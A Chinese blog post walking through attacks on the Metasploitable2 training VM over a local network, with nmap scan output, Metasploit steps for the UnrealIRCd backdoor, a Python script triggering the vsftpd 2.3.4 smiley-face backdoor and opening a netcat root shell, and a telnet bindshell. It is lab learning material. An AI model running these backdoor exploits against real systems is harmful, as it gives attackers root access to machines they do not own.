Metaspoitable2安全测试靶机の测试心得(上)

已于 2024-06-12 11:35:05 修改
阅读量897 收藏 13
点赞数 25
分类专栏: 网络安全 文章标签: 安全 学习 microsoft
于 2024-06-11 23:27:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web_kids/article/details/139604792
版权

废话and前情提要

大家好,我又来写一些让人不知所云的东西了!
------------------------------------下划线-------------------------------------------

非常感谢大家对我上一篇文章的支持!ありがとうございます!

------------------------------------下划线-------------------------------------------
不过趁着这次放假,要不我再努努力,写点新把戏?
这次就不写破解了,写点啥?那来点渗透吧!
迅速进入正题!!

使用的thingsname
靶机metasploitable2
攻击者我的kali
工具metasploit,nmap,dirsearch…………
  • 靶机描述:

metasploitable2 comment

  • 靶机的账户和密码:msfadmin/msfadmin

启动!!

kali

hostIPaddress
靶机192.168.31.172
kali192.168.31.16

以上是局域网内的IP地址

正式开始attack!

第一招:backdoor!

当然了我们还是得先用nmap扫一遍

cancanneed端口:

nmap --min-rate 10000 -sS -sV 192.168.31.172

返回内容:


```map scan report for msf.cn (192.168.31.172)
Host is up (0.0029s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:95:15:CC (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

来点详细的:

nmap --min-rate 10000 -sS -sV -sC 192.168.31.172  (-sC是执行基本脚本扫描)

返回内容:

Nmap scan report for msf.cn (192.168.31.172)
Host is up (0.0026s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.31.16
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-06-11T14:50:14+00:00; +7s from scanner time.
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      34805/udp   mountd
|   100005  1,2,3      51580/tcp   mountd
|   100021  1,3,4      37617/tcp   nlockmgr
|   100021  1,3,4      46045/udp   nlockmgr
|   100024  1          46281/tcp   status
|_  100024  1          54588/udp   status
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsCompression, Speaks41ProtocolNew, SupportsTransactions
|   Status: Autocommit
|_  Salt: '{V|/rqap0<|||wa`>Tl
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2024-06-11T14:50:14+00:00; +7s from scanner time.
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:13:36
|   source ident: nmap
|   source host: D3A9493A.EDAFDF4B.FFFA6D49.IP
|_  error: Closing Link: doyprella[192.168.31.16] (Quit: doyprella)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:95:15:CC (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-06-11T10:50:05-04:00
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 6s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

现在分析一下,你可以得知什么?
两个大大的后门摆在你面前啊!!!
(指vsftpd2.3.4和Unrealircd)

第一个backdoor:unrealircd

现在打开metasploit!现在!
msf
search点exploit:

search unreal ircd

ok
直接开输!

use 0
show options
set rhost 192.168.31.172
show options
show payloads
set payload 6
set  lhost 192.168.31.16
set lport 4444
run

在这里插入图片描述
成功连接!还是root。

第二个后门:vsftpd2.3.4

说起来好笑,他们的开发商起这个名字的目的是为了彰显自家产品安全性(very security FTP),然后就让人插后门了。

这次我们就不用msf了。而是采用netcat。

(说起来还有一个好笑的点,它tm的允许匿名登录)

尝试ftp连接:

ftp 192.168.31.172

在这里插入图片描述

看到了没?这玩意突然卡了。但不是因为突然出问题了,而是触发了后门。然后就会在6200端口上给一个root连接。

触发后门的条件:在输入的username后面跟一个笑脸:)😃

然后连接:

nc 192.168.31.172 6200

在这里插入图片描述
我没事干还写了个自动程序:

from socket import *
import os

def main():
    ip='192.168.8.171'
    setdefaulttimeout(4)
    port=21
    tar=socket(AF_INET,SOCK_STREAM)
    tar.connect((ip,port))

    tar.send(b"USER qweewr:) \r\n \r\n")
    p=tar.recv(4096).decode()
    print(p)
    tar.send(b"PASS \r\n \r\n")
    p=tar.recv(4096).decode()
    print(p)
    os.system(f"nc {ip} 6200")
    print('[+]done!!')
if __name__ =="__main__":
    try:
        main()
    except:
        print('[-]Error!!')
        pass

ok!
这就是以上两个后门的用法!
先拜拜了,下次再写,我爸妈催我睡觉了

day2

我又跑回来更新辣!
其实昨天还有一个后门我没有说,先执行以下命令:

nmap -sV -p  1524 192.168.31.172
telnet 192.168.31.172 1524

然后就会返回一个连接。

会走路的格子衫
关注
专栏目录
metaspoit-frame master
11-04
需要自己在Linux段进行编译
metasploitable2靶场渗透
weixin_45349299的博客
02-13 430
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
网络安全靶场推荐,让你通过实操能快速提升实战技能!
最新发布
2401_85773496的博客
08-19 984
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
渗透测试-Metasploitable2靶机
道阻且长,行则将至。
02-22 8004
靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1520
Metasploitable2
使用Metasploitable2靶机
qq_38827988的博客
06-22 170
(27条消息) Metasploitable2-Linux在VMware Workstation Pro上安装_xiaojiakun的博客-CSDN博客
OWASP靶机安全学习测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
靶机测试,网络安全安全测试
04-20
靶机测试,网络安全安全测试
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是一个集成的Web服务器套件,包含了Apache、MySQL、PHP和Perl等组件...
安全测试-dvwa靶机搭建
吕海洋的博客
03-15 440
推荐直接使用官方docker镜像搭建。 docker run --rm -itd -p 8888:80 --name dvwa vulnerables/web-dvwa
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
metasploitable2靶场漏洞总结(部分)
leavrow的博客
08-17 3475
部分metasploitable2渗透靶场漏洞,有很多漏洞都过时了
Metasploitable2靶机学习
m0_46371267的博客
10-13 4145
Metasploitable2靶机渗透 什么是Metasploitable2Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
Metasploitable-linux-2.0.0靶机配置教程
draper-crypto的博客
01-04 1751
metasploitable-linux-2.0.0配置
Metasploitable安装与介绍
永远是少年
06-01 4844
今天继续给大家介绍渗透测试相关知识,本文主要内容是Metasploitable安装与介绍。 一、Metasploitable介绍 二、Metasploitable下载 三、Metasploitable安装 四、Metasploitable修改网络配置
Linux下metasploitable安装与日志
Shaw的个人博客
02-10 771
最近老大让做日志审计,其中一部分是做web安全相关的日志审计,所以需要*靶机拿日志数据。这里选择的就是metasploitable。 我的本机操作系统是manjaro(arch系linux,虽然很多arch死忠粉比较嫌弃吧) 1.首先安装虚拟机,这个我用的是Oracle VM VirtualBox。具体的安装方式我会在我的其他博客中写明的,可以在我的博客中查看。 2.metasploitab...
Metasploitable2靶场搭建
Misous的博客
12-23 444
Kali或其它主机要跟Metasploitable2在同一个网断,要么都用桥接,要么都用NAT,登陆用户名/密码:msfadmin/ msfadmin,但权限较低,可激活root。用VM打开Metasploitable2虚拟机,
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6979
Metasploitable2靶机渗透学习
Zico2靶机渗透测试实战指南
在渗透测试领域,Zico2靶机提供了丰富的环境来模拟真实世界的网络安全挑战。为了开始这个渗透实战,我们需要准备一个测试机(如Kali Linux 2020.4)和Zico2靶机,两者都应设置为NAT模式并确保它们与宿主机(如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值